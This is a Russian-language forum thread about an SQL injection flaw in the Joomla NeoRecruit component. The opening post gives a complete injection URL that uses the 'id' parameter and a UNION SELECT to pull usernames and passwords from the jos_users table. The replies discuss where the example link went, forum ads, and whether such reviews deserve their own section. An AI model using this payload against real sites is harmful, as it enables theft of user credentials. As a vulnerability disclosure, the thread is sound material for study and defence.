Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре «id» сценарием index.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения. Пример: //index.php?option=com_neorecruit&task=offer_view&id=99999999999%20union%20select%201, concat(char(117,115,101,114,110,97,109,101,58), username,char(32,112,97,115,115,119,111,114,100,58), password),3,4,5,6,7,8,111,222,333,444,0,0,0,555, 666,777,888,1,2,3,4,5,0%20from%20jos_users/* http://xakep.ru/post/39854/default.asp
Ответ: Уязвимости в Joomla Component NeoRecruit пример или ссылку? PS: а реклама хакера бесит. т.к. окно в Опере не закрывается
Ответ: Уязвимости в Joomla Component NeoRecruit Google перестал искать торренты - второй пост от головы состава, а может, еще где. Пример - ссылка была, как раз после темы топика она в сообщении и находилась. Не знаю, может быть, для подобных обзоров следовало бы основать на форуме какой-то отдельный раздел? Не думаю, что подобная инфа может кому-то навредить...